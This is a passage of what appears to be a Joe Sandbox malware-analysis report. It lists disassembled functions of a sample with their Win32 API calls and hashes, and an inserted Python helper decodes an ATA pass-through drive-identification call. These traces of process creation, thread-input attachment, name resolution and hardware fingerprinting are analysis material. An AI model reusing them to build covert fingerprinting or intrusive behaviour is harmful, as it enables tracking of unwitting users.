                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: a1c769954c7c5c08d46f49855d0426640f81eeef49279cea27502df17aaa558f
                                                    • Instruction ID: a97feb3b71904ecb1551487fdb0145fd77b8348bb2f0739a7a85b2c9a7b2e128
                                                    • Opcode Fuzzy Hash: a1c769954c7c5c08d46f49855d0426640f81eeef49279cea27502df17aaa558f
                                                    • Instruction Fuzzy Hash: A811B136100345EFCF29AF64DC499BA77AAFF45311F40412AEC06CB258EB729A55CBA4
                                                    APIs
                                                    • _free.LIBCMT ref: 00635351
                                                      • Part of subcall function 0062594C: __FF_MSGBANNER.LIBCMT ref: 00625963
                                                      • Part of subcall function 0062594C: __NMSG_WRITE.LIBCMT ref: 0062596A
                                                      • Part of subcall function 0062594C: RtlAllocateHeap.NTDLL(01300000,00000000,00000001,00000000,?,?,?,00621013,?), ref: 0062598F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free
                                                    • String ID:
                                                    • API String ID: 614378929-0
                                                    • Opcode ID: 691b722fb4ce67796b67b01326241389eac5e5607736386913ee01066485cebc
                                                    • Instruction ID: c0961463a996db5ced2320d2050e3504f13240fbcd2ef2414f98e583293e2cde
                                                    • Opcode Fuzzy Hash: 691b722fb4ce67796b67b01326241389eac5e5607736386913ee01066485cebc
                                                    • Instruction Fuzzy Hash: 4911C132505E36AFEB312F70BC456A9379B9F103A0F10092EF9069B290EFB589418BD4
                                                    APIs
                                                    • _memset.LIBCMT ref: 00604560
                                                      • Part of subcall function 0060410D: _memset.LIBCMT ref: 0060418D
                                                      • Part of subcall function 0060410D: _wcscpy.LIBCMT ref: 006041E1
                                                      • Part of subcall function 0060410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006041F1
                                                    • KillTimer.USER32(?,00000001,?,?), ref: 006045B5
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006045C4
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0063D6CE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                    • String ID:
                                                    • API String ID: 1378193009-0
                                                    • Opcode ID: d7a709848e3a73aa61c06c387bc36d2723a9517b69f91bc799cb6380e54e2c2d
                                                    • Instruction ID: 8e874c38e8030863236077c1434cd22cda5b601bf03512defe6bd7eacb0fe351
                                                    • Opcode Fuzzy Hash: d7a709848e3a73aa61c06c387bc36d2723a9517b69f91bc799cb6380e54e2c2d
                                                    • Instruction Fuzzy Hash: 2C21DAB0944794AFEB338B24EC55BE7BBEE9F02304F04009EE69D56281C7745A858B91
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006640D1
                                                    • _memset.LIBCMT ref: 006640F2
                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00664144
                                                    • CloseHandle.KERNEL32(00000000), ref: 0066414D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                    • String ID:
                                                    • API String ID: 1157408455-0
                                                    • Opcode ID: b833f0ca885af20b6041324a91e2d37adf569378d287f8a3c98f8d9591636dae
                                                    • Instruction ID: 15282745bcf461ba0c2669145c57e97c089e8aa07a2c093044a50e1ac803c2fa
                                                    • Opcode Fuzzy Hash: b833f0ca885af20b6041324a91e2d37adf569378d287f8a3c98f8d9591636dae
                                                    • Instruction Fuzzy Hash: D711A7759012387AD7309BA5AC4DFEBBB7DEF45760F1042AAF908D7280D6744E808BA4
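Decoding the constants in the record above (an added worked example, not part of the Joe Sandbox report or the AutoIt runtime): CreateFileW is called with dwDesiredAccess 0xC0000000 (GENERIC_READ|GENERIC_WRITE), dwShareMode 3 (FILE_SHARE_READ|FILE_SHARE_WRITE), OPEN_EXISTING (3) and FILE_ATTRIBUTE_NORMAL (0x80), and the DeviceIoControl code 0x0004D02C is IOCTL_ATA_PASS_THROUGH, i.e. CTL_CODE(IOCTL_SCSI_BASE, 0x040b, METHOD_BUFFERED, FILE_READ_ACCESS|FILE_WRITE_ACCESS). Read/write open followed by an ATA pass-through IOCTL is the sequence used to send ATA commands straight to a physical drive, which in practice usually means reading the drive's IDENTIFY data (hardware serial and model); that use, and the drive path, are interpretations, since the listing does not recover lpFileName. The script below rebuilds the CTL_CODE arithmetic and names the CreateFileW arguments so a triager can label such records without looking each value up by hand; the sample record is the one constructed from the call above.

```python
"""Decode raw Win32 constants from a disassembly API record.

Added triage helper, not Joe Sandbox or AutoIt code.  CTL_CODE bit layout
(winioctl.h):  DeviceType<<16 | RequiredAccess<<14 | Function<<2 | Method.
"""

METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
DEVICE_TYPES = {0x04: "FILE_DEVICE_CONTROLLER", 0x07: "FILE_DEVICE_DISK",
                0x2D: "FILE_DEVICE_MASS_STORAGE"}
IOCTL_SCSI_BASE = 0x04     # FILE_DEVICE_CONTROLLER
IOCTL_STORAGE_BASE = 0x2D  # FILE_DEVICE_MASS_STORAGE


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Same arithmetic as the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# A few codes rebuilt from their SDK definitions (ntddscsi.h / ntddstor.h).
KNOWN_IOCTLS = {
    ctl_code(IOCTL_SCSI_BASE, 0x0401, 0, 3): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(IOCTL_SCSI_BASE, 0x0402, 0, 3): "IOCTL_SCSI_MINIPORT",
    ctl_code(IOCTL_SCSI_BASE, 0x0405, 0, 3): "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    ctl_code(IOCTL_SCSI_BASE, 0x040B, 0, 3): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(IOCTL_SCSI_BASE, 0x040C, 0, 3): "IOCTL_ATA_PASS_THROUGH_DIRECT",
    ctl_code(IOCTL_STORAGE_BASE, 0x0420, 0, 0): "IOCTL_STORAGE_GET_DEVICE_NUMBER",
    ctl_code(IOCTL_STORAGE_BASE, 0x0500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
}


def decode_ctl_code(code: int) -> dict:
    """Split an IOCTL into its four CTL_CODE fields and name it if known."""
    device_type = (code >> 16) & 0xFFFF
    return {
        "device_type": device_type,
        "device_type_name": DEVICE_TYPES.get(device_type, "unknown"),
        "access": ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "name": KNOWN_IOCTLS.get(code, "unknown"),
    }


# CreateFileW argument tables (winnt.h / fileapi.h).
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
         0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x20000000: "FILE_FLAG_NO_BUFFERING",
         0x40000000: "FILE_FLAG_OVERLAPPED", 0x80000000: "FILE_FLAG_WRITE_THROUGH"}


def decode_flags(value: int, table: dict) -> str:
    """Render a bitmask as the OR of the table names it contains."""
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else "0"


def decode_createfile(access: int, share: int, disposition: int, flags: int) -> dict:
    return {
        "access": decode_flags(access, GENERIC),
        "share": decode_flags(share, SHARE),
        "disposition": DISPOSITION.get(disposition, "unknown"),
        "flags": decode_flags(flags, FLAGS),
    }


def analyze_record(createfile_args: tuple, ioctl: int, in_size: int, out_size: int) -> dict:
    """Combine both calls and flag a raw device command (any *PASS_THROUGH* IOCTL)."""
    io = decode_ctl_code(ioctl)
    return {
        "createfile": decode_createfile(*createfile_args),
        "ioctl": io,
        "raw_device_command": "PASS_THROUGH" in io["name"],
        "buffers": (in_size, out_size),
    }


# Constructed from the record above; lpFileName is not recovered in the listing.
RECORD = {
    "CreateFileW": (0xC0000000, 0x00000003, 0x00000003, 0x00000080),
    "DeviceIoControl": (0x0004D02C, 0x200, 0x200),
}

if __name__ == "__main__":
    for key, value in analyze_record(RECORD["CreateFileW"], *RECORD["DeviceIoControl"]).items():
        print(f"{key}: {value}")
```

Run as-is it prints the decoded record; `analyze_record` returns `raw_device_command` True for this listing, and the same `decode_ctl_code` can be pointed at any other DeviceIoControl code that turns up in the report (unknown codes still get their device type, function and method fields back).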
                                                    APIs
                                                      • Part of subcall function 00605B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667B20,?,?,00000000), ref: 00605B8C
                                                      • Part of subcall function 00605B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667B20,?,?,00000000,?,?), ref: 00605BB0
                                                    • gethostbyname.WSOCK32(?,?,?), ref: 006766AC
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006766B7
                                                    • _memmove.LIBCMT ref: 006766E4
                                                    • inet_ntoa.WSOCK32(?), ref: 006766EF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1504782959-0
                                                    • Opcode ID: d37cfbb8dbb11baf590afb720013faabe373916b832304a5dc6c8de2dd4dca89
                                                    • Instruction ID: f56006d6e5e76e24ce234d39eace72b22d3b745efea7adddf23e8593a92d9bf5
                                                    • Opcode Fuzzy Hash: d37cfbb8dbb11baf590afb720013faabe373916b832304a5dc6c8de2dd4dca89
                                                    • Instruction Fuzzy Hash: A2118175540508AFCF44EBA4DD96DEF77BAAF04310B144169F506A71A2DF30AE04CB65
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00659043
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00659055
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0065906B
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00659086
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 8c46b2523b04225db20c5479b40b299e5b6f4ddd944c84921347660d180f21d7
                                                    • Instruction ID: e93ef8771cc2c5e2ada5e444d1c877fc39a044bab5204af42d20668bbe631048
                                                    • Opcode Fuzzy Hash: 8c46b2523b04225db20c5479b40b299e5b6f4ddd944c84921347660d180f21d7
                                                    • Instruction Fuzzy Hash: 35115E79900218FFDB10DFA5CC84EDDBB75FB48310F204195E904B7290D6716E50DBA4
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 006012D8
                                                    • GetClientRect.USER32(?,?), ref: 0063B84B
                                                    • GetCursorPos.USER32(?), ref: 0063B855
                                                    • ScreenToClient.USER32(?,?), ref: 0063B860
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: b6955d040492f819cb28eb9001fafe3ac194e789adfa5355bd0333716addc314
                                                    • Instruction ID: 3343270978328c88aee68ee5a159d4b515e9964704822e0be9ba9a2c456ab3a4
                                                    • Opcode Fuzzy Hash: b6955d040492f819cb28eb9001fafe3ac194e789adfa5355bd0333716addc314
                                                    • Instruction Fuzzy Hash: 2E112835940019FBCB04EFA4D8899FF77BAEB06300F000956F911EB290D730AA919BA9
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006601FD,?,00661250,?,00008000), ref: 0066166F
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,006601FD,?,00661250,?,00008000), ref: 00661694
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,006601FD,?,00661250,?,00008000), ref: 0066169E
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,006601FD,?,00661250,?,00008000), ref: 006616D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: 1f7b94052e2e688e89894b083e9cde67f4e708a00afe2ec232d9684afb6db654
                                                    • Instruction ID: 41c45f8dd1f2f902ea653b76bf81fbff27478424c3f9c774c9c1f731b5cc6296
                                                    • Opcode Fuzzy Hash: 1f7b94052e2e688e89894b083e9cde67f4e708a00afe2ec232d9684afb6db654
                                                    • Instruction Fuzzy Hash: 8D115E35C0052DE7CF009FA5D948AEEBB7AFF0A751F194559E980FA240CB3055608BD6
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction ID: 002e0ce9e47441148cd4ff9a682234797686909c419d9630b71e93dcad8f1323
                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction Fuzzy Hash: 16014BB604818EBBCF625E84DC018EE3F67BF69351F588615FE1858131D236CAB1BB85
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 0068B59E
                                                    • ScreenToClient.USER32(?,?), ref: 0068B5B6
                                                    • ScreenToClient.USER32(?,?), ref: 0068B5DA
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0068B5F5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: 126695cca00ab864e1046336968bfff823e785cabdd926b0d97c70332b3bb4f4
                                                    • Instruction ID: 24d027dce4eca1beb4f4cd371b6f1648fb5c7e8e6eef414be7142ff98ab70ee9
                                                    • Opcode Fuzzy Hash: 126695cca00ab864e1046336968bfff823e785cabdd926b0d97c70332b3bb4f4
                                                    • Instruction Fuzzy Hash: B41146B5D00209EFDB41DF99C4449EEFBB5FF08310F105266E914E3220D775AA558F51
                                                    APIs
                                                    • _memset.LIBCMT ref: 0068B8FE
                                                    • _memset.LIBCMT ref: 0068B90D
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006C7F20,006C7F64), ref: 0068B93C
                                                    • CloseHandle.KERNEL32 ref: 0068B94E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID:
                                                    • API String ID: 3277943733-0
                                                    • Opcode ID: fed1a5d79324f790a7c79e6404a5866ef47ce78674891aeef00ca046041a5474
                                                    • Instruction ID: 9a4d54588f67de786e8623d4fb30c06b6bf27d12ac20914fe15182c3e691f70e
                                                    • Opcode Fuzzy Hash: fed1a5d79324f790a7c79e6404a5866ef47ce78674891aeef00ca046041a5474
                                                    • Instruction Fuzzy Hash: 42F082B25443107BF3102B61AC89FBB3A5EEB09354F006028FB18D5292D7754D008FBC
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 00666E88
                                                      • Part of subcall function 0066794E: _memset.LIBCMT ref: 00667983
                                                    • _memmove.LIBCMT ref: 00666EAB
                                                    • _memset.LIBCMT ref: 00666EB8
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00666EC8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                    • String ID:
                                                    • API String ID: 48991266-0
                                                    • Opcode ID: 67f83a2a80c7ec06f69d1d74cdbf7de04166aadfa3f35e7332431c5eef5e56d8
                                                    • Instruction ID: 244547756a6f65bf146951d8f7e1fdebd747ba979d7fffb9ff7e30fa8e246f9c
                                                    • Opcode Fuzzy Hash: 67f83a2a80c7ec06f69d1d74cdbf7de04166aadfa3f35e7332431c5eef5e56d8
                                                    • Instruction Fuzzy Hash: D8F0543A104210BBCF416F55EC85E49BB2BEF45360F048165FE085F21AC735A911DBB4
                                                    APIs
                                                      • Part of subcall function 006012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0060134D
                                                      • Part of subcall function 006012F3: SelectObject.GDI32(?,00000000), ref: 0060135C
                                                      • Part of subcall function 006012F3: BeginPath.GDI32(?), ref: 00601373
                                                      • Part of subcall function 006012F3: SelectObject.GDI32(?,00000000), ref: 0060139C
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0068C030
                                                    • LineTo.GDI32(00000000,?,?), ref: 0068C03D
                                                    • EndPath.GDI32(00000000), ref: 0068C04D
                                                    • StrokePath.GDI32(00000000), ref: 0068C05B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    • Opcode ID: 02ada74fd7b9683e897e1bfdccce32ee517da037083952ca09e9e8229b276cf7
                                                    • Instruction ID: 426a2909033ba96c356bb32e052139c26f0eb47a78be274fc5b843bc649ab1dc
                                                    • Opcode Fuzzy Hash: 02ada74fd7b9683e897e1bfdccce32ee517da037083952ca09e9e8229b276cf7
                                                    • Instruction Fuzzy Hash: 61F0BE31001219BBDB126F50EC09FDE3F5AAF06320F144200FA11650E287B54660DBA9
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0065A399
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0065A3AC
                                                    • GetCurrentThreadId.KERNEL32 ref: 0065A3B3
                                                    • AttachThreadInput.USER32(00000000), ref: 0065A3BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: d1e56e32b507c5b6a987047037203d8da88dd32b8c6ad97e60c53d220b07aa21
                                                    • Instruction ID: 04a9e64c1013e270bdb2b7c3db5b5374ceadae4f1b9faf6c3d1ab2361129e412
